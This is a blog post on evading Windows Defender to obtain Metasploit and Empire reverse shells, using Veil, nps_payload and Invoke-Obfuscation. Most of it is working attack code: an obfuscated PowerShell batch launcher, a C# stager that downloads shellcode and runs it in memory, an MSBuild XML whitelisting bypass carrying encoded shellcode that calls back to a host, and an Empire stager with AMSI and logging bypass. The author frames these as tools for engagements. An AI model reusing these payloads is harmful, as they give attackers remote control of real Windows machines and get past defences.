All This AV Bypassing Is Giving Me a Headache

I was recently tasked with deploying AV updates to a bunch of Windows machines in my corporate network and around about the same time someone had posed me a question asking something along the lines of what I did to get past Windows Defender. I’m not a red-teamer (though I think my alter-ego would certainly have me think I am) so it’s not something that I have had to deal with very often (other than some basic payload encryption with Metasploit for the OSCP). Assuming I couldn’t do something like Set-MpPreference -DisableRealtTimeMonitoring = $true with PowerShell or something similar to turn off AV, I realised this was a question I couldn’t answer with much certainty. It got me thinking about a few things. The first was whether our AV solution was fit-for-purpose, but more generally which AV vendors are more reliable. The second was to confirm whether Windows Defender is actually one of the better if not best solutions around and if so, try to find a technique which got me a working remote shell to my target machine.

As per the usual disclaimers, this is by no means an exhaustive review of every single tool, every file-based and in-memory based technique, nor does it cover all the various payloads and encryption/obfuscation techniques available as that would simply not be feasible for the time frame I had. Here I am simply documenting the things I attempted which worked and didn't work. Hopefully it'll be of some use to people and I will be very happy to receive any comments on anything that is incomplete or not quite accurate. I also focus on getting shells back with Empire and Metasploit only. The solution below only works in a Windows environment with the .NET framework installed.

TL;DR: Yes Windows Defender is at the time of writing one of the better AV solutions around. A modified version of a modified version of nps_payload was the only thing I could get working which was not detected by a fully up-to-date Defender.

If you’re short on time and want something that works and you can use right now, go straight to end of this post. If by the time you read this, it no longer works then good luck finding an alternative!

The good thing about testing your payloads against Windows Defender is that it is free and widely deployed. If you’re able to bypass Defender then most likely you’ll get past other vendors too and you don’t have to submit your payloads to VirusTotal or have to setup your own laborious AV testing environment, thus prolonging the shelf life of your payload. It’s easy, and I always prefer minimal effort for maximum impact.

Abundance in ChoiceTM Is Not Always a Good Thing


There’s a wealth of information out there on bypassing AV and figuring out where to start or what to use is not straightforward. I don’t have the luxury of having lots of dedicated time to researching the latest and greatest AV evasion techniques so I’ve had to rely on things I’ve heard people mention or happen to have come across online. The things I’ve tried do not follow any logical sequence and is somewhat haphazard. I do have to mention a great resource that I reference a fair bit is ‘The Hacker Playbook 3 Red Team Edition’ (or THP series generally). It has a ton of examples and provides a step-by-step guide on how to do things or gives you enough information to look into a tool or technique if it's relevant to your needs. The only issue I have with it is it doesn’t really provide a comparison of the effectiveness of the various tools.

Start Veil:

1. ./Veil.py

2. Type 'use 1' for Evasion

3. Type 'list' for list of available payloads

In my testing I used tried two payloads: 

4a. Use powershell/meterpreter/rev_https.py or 4b. Use cs/meterpreter/rev_https.py

5. Set the LHOST and LPORT as required.

6. Type 'generate'

This generates two files that are needed to run as well as the source code for the C# payload . An executable binary for the C# payload and a batch file for the PowerShell payload with the corresponding Metasploit resource file. The PowerShell batch file looks like this which uses powershell.exe and look like this:

@echo offif %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMe8XNpgRWoKzTV3JU1DmvQOodNiD3jLetdZrxOIy3/vGHwk/XpC8jLj2XmemXnG7AHO4J3Tmo6kvMxybazrrNAolL1ukEjpeDPIy7kUMRSWWzpwbek9XCp7bQ3cCWNLLs+l1LHb+GR+niQGi6INpVAWkqeJeMbGWOxjKZVWt5v8xX1ttMXYetH/5jI0yC3epnQkL1z29rm1RsxLi69IWR6v9swOweQz9sD+4L7mhmdIWIfLOywq4ULy5evIPdplQmU471rWbCqWUIed8/fD0YeLPz5e/vnXp/HV5+svN5Pbr3f33/7+h8/jBBfLVHxfyUzp/MEUtnx8Wm+ew0631//95M3bUye41cOUm3Nj+Mb1WotSxTU6xC579CowaEvqg+tOid10NgP2+OsN+AFj5EVp0P88/05tBn9SZl5AD/gNwnUnDMHHBzjtetuX7BYqtqjZO1EnCHo/FpqKi1Nf71LQu6MzYMnUXaL1DVeJzsDP+FpklJUlwSdUS5t6s23U8GOL6FV2hApyo2NqNVRTXhOdsTXB0eMI2L/bCFAlRGFN7AtSQ4MLlavw6T/jZofrBYq04Hrb7SuAZQXEGFwmzsKICfClhZM+/Ts68iqWEpKN2KoGTAgBI4CmQLoiQRDfFcUVdUBaM5IRiAW41PPC8+DQdYog2MZwTh+/fXWozOkV2mCC5lHEeK1pLGOu+BLNbDCovWiGaKxYCNoEvONSJDs5DbmUc5IlYVbMmhK3EcvIuKKCm8FNNoXFLKjT3+N8KAUqG7VYFnwk4aEpApKv65QFGp/wlHXa4Iz1s5CSH/eDkPjrLCewuaSKx5PLD3ASdCK4F9THpwKubj3Hi5gi0GUE0/cbiztB5XUbsmCkn5TUPBlxy10ntTYvBsfHne6bIKRfZ9Dv946ZcsBrMU03iItfbznpArM5mhEuhBK76bAH8K9oq8Ah6F7XAV+RVeQ8Rth5Lpo5FuDnvChsasoWW58xPRj88tUJ2yxvtNYO170wDOnoh140bVp1UyorMgxoSdHovBlKEYy5KVIuaSJDnW9clrchbMN0v8szl61ph8jodV3Pa8MBpC6Nrrz+2BBim63b9RHWu6ZL66tSkmB2HxR/IhFzWjmMNSn67Uk/DLc0+Dittj8B\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMe8XNpgRWoKzTV3JU1DmvQOodNiD3jLetdZrxOIy3/vGHwk/XpC8jLj2XmemXnG7AHO4J3Tmo6kvMxybazrrNAolL1ukEjpeDPIy7kUMRSWWzpwbek9XCp7bQ3cCWNLLs+l1LHb+GR+niQGi6INpVAWkqeJeMbGWOxjKZVWt5v8xX1ttMXYetH/5jI0yC3epnQkL1z29rm1RsxLi69IWR6v9swOweQz9sD+4L7mhmdIWIfLOywq4ULy5evIPdplQmU471rWbCqWUIed8/fD0YeLPz5e/vnXp/HV5+svN5Pbr3f33/7+h8/jBBfLVHxfyUzp/MEUtnx8Wm+ew0631//95M3bUye41cOUm3Nj+Mb1WotSxTU6xC579CowaEvqg+tOid10NgP2+OsN+AFj5EVp0P88/05tBn9SZl5AD/gNwnUnDMHHBzjtetuX7BYqtqjZO1EnCHo/FpqKi1Nf71LQu6MzYMnUXaL1DVeJzsDP+FpklJUlwSdUS5t6s23U8GOL6FV2hApyo2NqNVRTXhOdsTXB0eMI2L/bCFAlRGFN7AtSQ4MLlavw6T/jZofrBYq04Hrb7SuAZQXEGFwmzsKICfClhZM+/Ts68iqWEpKN2KoGTAgBI4CmQLoiQRDfFcUVdUBaM5IRiAW41PPC8+DQdYog2MZwTh+/fXWozOkV2mCC5lHEeK1pLGOu+BLNbDCovWiGaKxYCNoEvONSJDs5DbmUc5IlYVbMmhK3EcvIuKKCm8FNNoXFLKjT3+N8KAUqG7VYFnwk4aEpApKv65QFGp/wlHXa4Iz1s5CSH/eDkPjrLCewuaSKx5PLD3ASdCK4F9THpwKubj3Hi5gi0GUE0/cbiztB5XUbsmCkn5TUPBlxy10ntTYvBsfHne6bIKRfZ9Dv946ZcsBrMU03iItfbznpArM5mhEuhBK76bAH8K9oq8Ah6F7XAV+RVeQ8Rth5Lpo5FuDnvChsasoWW58xPRj88tUJ2yxvtNYO170wDOnoh140bVp1UyorMgxoSdHovBlKEYy5KVIuaSJDnW9clrchbMN0v8szl61ph8jodV3Pa8MBpC6Nrrz+2BBim63b9RHWu6ZL66tSkmB2HxR/IhFzWjmMNSn67Uk/DLc0+Dittj8B\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

 

The C# source code looks like this:

using System;
using System.Net;
using System.Net.Sockets;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
namespace OYQwKIQMm {
 class bAfmNhaYDz {
  private static bool aSNAzprmhH(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert, System.Security.Cryptography.X509Certificates.X509Chain chain, System.Net.Security.SslPolicyErrors sslPolicyErrors) {
   return true;
  }
  static string vNMzuLlVnFLKLT(Random r, int s) {
   char[] UkEmEhsCRf = new char[s];
   string gZEuPlifGOKF = "xQ50p1uPRqJSwYezCDHEoWcGbUhlO7vt3ByTiZ462LXIMnk9V8mraKNgAFdsfj";
   for (int i = 0; i < s; i++) {
    UkEmEhsCRf[i] = gZEuPlifGOKF[r.Next(gZEuPlifGOKF.Length)];
   }
   return new string(UkEmEhsCRf);
  }
  static bool wIhMmCQMV(string s) {
   return ((s.ToCharArray().Select(x => (int) x).Sum()) % 0x100 == 92);
  }
  static string Mfcqftm(Random r) {
   string nJQOXtf = "";
   for (int i = 0; i < 64; ++i) {
    nJQOXtf = vNMzuLlVnFLKLT(r, 3);
    string YMQMFZIHHxfo = new string("T4tApq7ZxoVeaiQfSYB6nmPzwXjvL58c1g2dk0NEu3MCJUKIhWFObHsGyr9DlR".ToCharArray().OrderBy(s => (r.Next(2) % 2) == 0).ToArray());
    for (int j = 0; j < YMQMFZIHHxfo.Length; ++j) {
     string HXFZAEiGwyLuPHM = nJQOXtf + YMQMFZIHHxfo[j];
     if (wIhMmCQMV(HXFZAEiGwyLuPHM)) {
      return HXFZAEiGwyLuPHM;
     }
    }
   }
   return "9vXU";
  }
  static byte[] KhXFGUdsOMg(string XXKePMjiRgmj) {
   ServicePointManager.ServerCertificateValidationCallback = aSNAzprmhH;
   WebClient GGDQPcH = new System.Net.WebClient();
   GGDQPcH.Headers.Add("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");
   GGDQPcH.Headers.Add("Accept", "*/*");
   GGDQPcH.Headers.Add("Accept-Language", "en-gb,en;q=0.5");
   GGDQPcH.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7");
   byte[] vmswmkvjez = null;
   try {
    vmswmkvjez = GGDQPcH.DownloadData(XXKePMjiRgmj);
    if (vmswmkvjez.Length < 100000) return null;
   } catch (WebException) {}
   return vmswmkvjez;
  }
  static void JURjiWiNpl(byte[] zCslHHElCpxnEZ) {
   if (zCslHHElCpxnEZ != null) {
    UInt32 CjsjpH = VirtualAlloc(0, (UInt32) zCslHHElCpxnEZ.Length, 0x1000, 0x40);
    Marshal.Copy(zCslHHElCpxnEZ, 0, (IntPtr)(CjsjpH), zCslHHElCpxnEZ.Length);
    IntPtr GcepaerwSLQrkga = IntPtr.Zero;
    UInt32 NSUsDGl = 0;
    IntPtr QTkUWmZYXwlo = IntPtr.Zero;
    GcepaerwSLQrkga = CreateThread(0, 0, CjsjpH, QTkUWmZYXwlo, 0, ref NSUsDGl);
    WaitForSingleObject(GcepaerwSLQrkga, 0xFFFFFFFF);
   }
  }
  static void Main() {
   Random lwcsAmkXgrSU = new Random((int) DateTime.Now.Ticks);
   byte[] qmgIUVXoBc = KhXFGUdsOMg("https://127.0.0.1:443/" + Mfcqftm(lwcsAmkXgrSU));
   JURjiWiNpl(qmgIUVXoBc);
  } [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 SiQBawPaorIXvAX, UInt32 vkFugSDRAypZr, UInt32 NotUYbIY, UInt32 QSZLUQZT);
  [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 jMUkuC, UInt32 patCLISCIF, UInt32 mzdAYVdcGdf, IntPtr RexsWcjKjwIkb, UInt32 oqyYSocqrWazPz, ref UInt32 fEHvPFRDxg);
  [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr IqnViuRw, UInt32 QqBCUOOeqvf);
 }
}

I uploaded the C# executable and batch script to VirusTotal and was very surprised to find that 35/69 engines detected the C# payload and 26/59 had detected the batch script as being malicious:

C# executable:

PowerShell batch script:

This was not very good but at least our AV solution was detecting it! I didn't try any other payloads as I assumed that there'd be fairly similar results.

nps_payload - Attempt Number 1


At this point I decided to try one of the no PowerShell techniques mentioned in the THP3 using nps_payload which you can find here https://github.com/trustedsec/nps_payload. This tool uses one of the cool application whitelisting bypass techniques using msbuild and a malicious XML file (see https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/ for more information).

It is straightforward to install and get running. I generated a payload using the default options for a Windows Meterpreter Reverse HTTPS shell as shown below:

Copy the XML file to a location on the target and execute with the following command (note: it is not necessary to run with administrative privileges):

%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe [full filepath to xml file]

This does not work out of the box with Windows Defender running. I made a few small changes to the XML file by replacing nps references to ‘test’ where I could, as shown below and submitted it to VirusTotal to see how it fared.

The XML file below was only detected by two AV engines (3 with no modifications):

<Project ToolsVersion="4.0"
	xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
	<!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
	<!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
	<!-- License: BSD 3-Clause -->
	<Target Name="test">
		<test />
	</Target>
	<UsingTask    TaskName="test"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
		<Task>
			<Reference Include="System.Management.Automation" />
			<Code Type="Class" Language="cs">
				<![CDATA[using System; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; public class test: Task, ITask {
                    public override bool Execute() {
                        string cmd = "JG5GZ3BkV2JlID0gQCINCltEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFZpcnR1YWxBbGxvYyhJbnRQdHIgbHBBZGRyZXNzLCB1aW50IGR3U2l6ZSwgdWludCBmbEFsbG9jYXRpb25UeXBlLCB1aW50IGZsUHJvdGVjdCk7DQpbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7DQoiQA0KDQokYndSYXR2aGxpdk1lZFYgPSBBZGQtVHlwZSAtbWVtYmVyRGVmaW5pdGlvbiAkbkZncGRXYmUgLU5hbWUgIldpbjMyIiAtbmFtZXNwYWNlIFdpbjMyRnVuY3Rpb25zIC1wYXNzdGhydQ0KDQpbQnl0ZVtdXSAkY0VrWEFUeEtTbUdSU0RkID0gMHhmYywweGU4LDB4ODIsMHgwLDB4MCwweDAsMHg2MCwweDg5LDB4ZTUsMHgzMSwweGMwLDB4NjQsMHg4YiwweDUwLDB4MzAsMHg4YiwweDUyLDB4YywweDhiLDB4NTIsMHgxNCwweDhiLDB4NzIsMHgyOCwweGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4YWMsMHgzYywweDYxLDB4N2MsMHgyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4ZTIsMHhmMiwweDUyLDB4NTcsMHg4YiwweDUyLDB4MTAsMHg4YiwweDRhLDB4M2MsMHg4YiwweDRjLDB4MTEsMHg3OCwweGUzLDB4NDgsMHgxLDB4ZDEsMHg1MSwweDhiLDB4NTksMHgyMCwweDEsMHhkMywweDhiLDB4NDksMHgxOCwweGUzLDB4M2EsMHg0OSwweDhiLDB4MzQsMHg4YiwweDEsMHhkNiwweDMxLDB4ZmYsMHhhYywweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4MzgsMHhlMCwweDc1LDB4ZjYsMHgzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTQsMHg1OCwweDhiLDB4NTgsMHgyNCwweDEsMHhkMywweDY2LDB4OGIsMHhjLDB4NGIsMHg4YiwweDU4LDB4MWMsMHgxLDB4ZDMsMHg4YiwweDQsMHg4YiwweDEsMHhkMCwweDg5LDB4NDQsMHgyNCwweDI0LDB4NWIsMHg1YiwweDYxLDB4NTksMHg1YSwweDUxLDB4ZmYsMHhlMCwweDVmLDB4NWYsMHg1YSwweDhiLDB4MTIsMHhlYiwweDhkLDB4NWQsMHg2OCwweDZlLDB4NjUsMHg3NCwweDAsMHg2OCwweDc3LDB4NjksMHg2ZSwweDY5LDB4NTQsMHg2OCwweDRjLDB4NzcsMHgyNiwweDcsMHhmZiwweGQ1LDB4MzEsMHhkYiwweDUzLDB4NTMsMHg1MywweDUzLDB4NTMsMHhlOCwweDNlLDB4MCwweDAsMHgwLDB4NGQsMHg2ZiwweDdhLDB4NjksMHg2YywweDZjLDB4NjEsMHgyZiwweDM1LDB4MmUsMHgzMCwweDIwLDB4MjgsMHg1NywweDY5LDB4NmUsMHg2NCwweDZmLDB4NzcsMHg3MywweDIwLDB4NGUsMHg1NCwweDIwLDB4MzYsMHgyZSwweDMxLDB4M2IsMHgyMCwweDU0LDB4NzIsMHg2OSwweDY0LDB4NjUsMHg2ZSwweDc0LDB4MmYsMHgzNywweDJlLDB4MzAsMHgzYiwweDIwLDB4NzIsMHg3NiwweDNhLDB4MzEsMHgzMSwweDJlLDB4MzAsMHgyOSwweDIwLDB4NmMsMHg2OSwweDZiLDB4NjUsMHgyMCwweDQ3LDB4NjUsMHg2MywweDZiLDB4NmYsMHgwLDB4NjgsMHgzYSwweDU2LDB4NzksMHhhNywweGZmLDB4ZDUsMHg1MywweDUzLDB4NmEsMHgzLDB4NTMsMHg1MywweDY4LDB4YmIsMHgxLDB4MCwweDAsMHhlOCwweGUxLDB4MCwweDAsMHgwLDB4MmYsMHg0NCwweDcxLDB4NjMsMHg2MywweDYxLDB4NDMsMHg1NCwweDRlLDB4NWYsMHg2NywweDQ5LDB4NzIsMHg2OCwweDc5LDB4NzEsMHg0NywweDY0LDB4MmQsMHg1OCwweDMxLDB4NzcsMHg3NywweDZmLDB4MzksMHg2ZSwweDU0LDB4NWEsMHg3MywweDc5LDB4NWYsMHg1OCwweDcwLDB4NTEsMHg1OCwweDZhLDB4NDcsMHg0MiwweDZhLDB4NmMsMHg2ZCwweDZhLDB4NTMsMHg3MiwweDdhLDB4NTksMHg0NiwweDdhLDB4NzUsMHg2MywweDYxLDB4NGQsMHg1OCwweDZmLDB4NTcsMHg3MSwweDMxLDB4NzMsMHg3MSwweDU4LDB4NGMsMHg0NywweDc3LDB4NTksMHgzMSwweDcwLDB4NWEsMHg0ZSwweDZlLDB4NmYsMHg0YiwweDQzLDB4NmEsMHg0NCwweDYyLDB4NzcsMHg3NywweDUyLDB4NTMsMHg0YiwweDdhLDB4MCwweDUwLDB4NjgsMHg1NywweDg5LDB4OWYsMHhjNiwweGZmLDB4ZDUsMHg4OSwweGM2LDB4NTMsMHg2OCwweDAsMHgzMiwweGUwLDB4ODQsMHg1MywweDUzLDB4NTMsMHg1NywweDUzLDB4NTYsMHg2OCwweGViLDB4NTUsMHgyZSwweDNiLDB4ZmYsMHhkNSwweDk2LDB4NmEsMHhhLDB4NWYsMHg2OCwweDgwLDB4MzMsMHgwLDB4MCwweDg5LDB4ZTAsMHg2YSwweDQsMHg1MCwweDZhLDB4MWYsMHg1NiwweDY4LDB4NzUsMHg0NiwweDllLDB4ODYsMHhmZiwweGQ1LDB4NTMsMHg1MywweDUzLDB4NTMsMHg1NiwweDY4LDB4MmQsMHg2LDB4MTgsMHg3YiwweGZmLDB4ZDUsMHg4NSwweGMwLDB4NzUsMHgxNCwweDY4LDB4ODgsMHgxMywweDAsMHgwLDB4NjgsMHg0NCwweGYwLDB4MzUsMHhlMCwweGZmLDB4ZDUsMHg0ZiwweDc1LDB4Y2QsMHhlOCwweDRhLDB4MCwweDAsMHgwLDB4NmEsMHg0MCwweDY4LDB4MCwweDEwLDB4MCwweDAsMHg2OCwweDAsMHgwLDB4NDAsMHgwLDB4NTMsMHg2OCwweDU4LDB4YTQsMHg1MywweGU1LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg1MywweDg5LDB4ZTcsMHg1NywweDY4LDB4MCwweDIwLDB4MCwweDAsMHg1MywweDU2LDB4NjgsMHgxMiwweDk2LDB4ODksMHhlMiwweGZmLDB4ZDUsMHg4NSwweGMwLDB4NzQsMHhjZiwweDhiLDB4NywweDEsMHhjMywweDg1LDB4YzAsMHg3NSwweGU1LDB4NTgsMHhjMywweDVmLDB4ZTgsMHg2YiwweGZmLDB4ZmYsMHhmZiwweDMxLDB4MzgsMHgyZSwweDMxLDB4MzMsMHgzMCwweDJlLDB4MzEsMHgzMSwweDM1LDB4MmUsMHgzOSwweDMzLDB4MCwweGJiLDB4ZjAsMHhiNSwweGEyLDB4NTYsMHg2YSwweDAsMHg1MywweGZmLDB4ZDUNCg0KDQokelVodXFnSmkgPSAkYndSYXR2aGxpdk1lZFY6OlZpcnR1YWxBbGxvYygwLFtNYXRoXTo6TWF4KCRjRWtYQVR4S1NtR1JTRGQuTGVuZ3RoLDB4MTAwMCksMHgzMDAwLDB4NDApDQoNCltTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGNFa1hBVHhLU21HUlNEZCwwLCR6VWh1cWdKaSwkY0VrWEFUeEtTbUdSU0RkLkxlbmd0aCkNCg0KJGJ3UmF0dmhsaXZNZWRWOjpDcmVhdGVUaHJlYWQoMCwwLCR6VWh1cWdKaSwwLDAsMCkNCmZvciAoOzspewogIFN0YXJ0LXNsZWVwIDYwCn0=";
                        PowerShell ps = PowerShell.Create();
                        ps.AddScript(Base64Decode(cmd));
                        Collection < PSObject > output = null;
                        try {
                            output = ps.Invoke();
                        } catch (Exception e) {
                            Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());
                        }
                        if (output != null) {
                            foreach(PSObject rtnItem in output) {
                                Console.WriteLine(rtnItem.ToString());
                            }
                        }
                        return true;
                    }
                    public static string Base64Encode(string text) {
                        return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
                    }
                    public static string Base64Decode(string encodedtext) {
                        return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
                    }
                }]] >
			</Code>
		</Task>
	</UsingTask>
</Project>

This is hardly the best sample but at this point I think it’s fair to say that Defender is actually quite good and if you’re able to get your payload past it then it’ll most likely be good with other AV engines. From here I focused on trying to find something that worked against Defender only. I’ll come back to nps_payload at the end but first I want to go over some of the other things I tried and failed.


Empire

It’s been a while since I’d used Empire and I’d never really tested it against AV so this part was interesting. I’d heard good things about Invoke-Obfuscation as a payload obfuscation tool and only after a bit of playing around did I realise that the latest version of Empire had the obfuscation part of Invoke-Obfuscation built into it – how cool is that?! If you’re familiar with Empire, in your launcher you just have to set the Obfuscate flag to ‘True’ and either use the default ObfuscateCommand or enter your own custom command. If you’re not familiar with Invoke-Obfuscation then you’d need to play around with the various obfuscation methods to find out what valid ObfuscateCommands are. Here’s a handy tutorial to get you started with Invoke-Obfuscation https://www.helloitsliam.com/2018/03/21/invoke-obfuscation so I won’t cover how to use it in detail.

I won’t evidence all the things I tested but unfortunately none of the Empire launchers with or without obfuscation could get past Defender. The way I did this was as follows:

1. Download and follow instructions here to install Empire https://github.com/EmpireProject/Empire.

2. Setup a listener (in this instance I used the http listener).

3. Generate the stager code in Empire and set the Obfuscate flag to true. In this example I used the ‘multi/launcher’ stager with the default ObfuscateCommand. Copy and paste the generated launcher code in a command prompt and as you can see below it works fine without AV.

However, when I turned Defender on it no longer worked. I did however upload this command as a file to VirusTotal and no AV engines flagged this as malicious. The launcher did work against our corporate AV however, so whilst it may not be effective against Defender it is likely this command will get past most AV engines so definitely worth trying out for yourself on engagements.


Invoke-Obfuscation

Rather than use Empire to generate and test payloads it’s much easier to do this directly in Invoke_Obfuscation. Using the Empire generated payload above I tried the following but none of the various Obfuscation options could get past Defender.

1. Generate the Empire stager without any obfuscation.

2. Start invoke-obfuscation which I did as follows.

Run the script (or import the module) and start Invoke-Obfuscation

.\Invoke-Obfuscation.ps1

 

3. Set the scriptblock to the stager code generated from Empire:

set scriptblock powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBlAHIAUwBpAG8AbgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAUwBpAE8AbgAuAE0AQQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAEYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAVABWAEEATAB1AGUAKAAkAE4AdQBsAEwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwBUAEkAbwBuAHMALgBHAGUAbgBFAHIASQBDAC4ARABpAGMAdABpAE8ATgBhAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAFMAVABlAE0ALgBPAEIAagBFAGMAdABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEAbAB9AEUATABTAGUAewBbAFMAQwByAGkAcAB0AEIATABPAGMASwBdAC4AIgBHAGUAdABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAVQBlACgAJABuAFUATABMACwAKABOAEUAdwAtAE8AQgBqAGUAQwBUACAAQwBPAGwATABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAQwAuAEgAYQBTAEgAUwBFAFQAWwBTAFQAUgBpAE4AZwBdACkAKQB9AFsAUgBlAEYAXQAuAEEAcwBTAGUATQBCAGwAeQAuAEcARQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAEUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATAB1AEUAKAAkAE4AVQBsAEwALAAkAFQAUgB1AGUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAEUAdAAuAFMAZQBSAFYASQBDAGUAUABPAEkATgB0AE0AQQBOAGEARwBlAHIAXQA6ADoARQB4AFAARQBjAHQAMQAwADAAQwBvAE4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAFcALQBPAGIASgBlAGMAVAAgAFMAeQBTAFQARQBtAC4ATgBFAFQALgBXAEUAQgBDAEwASQBFAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBhAE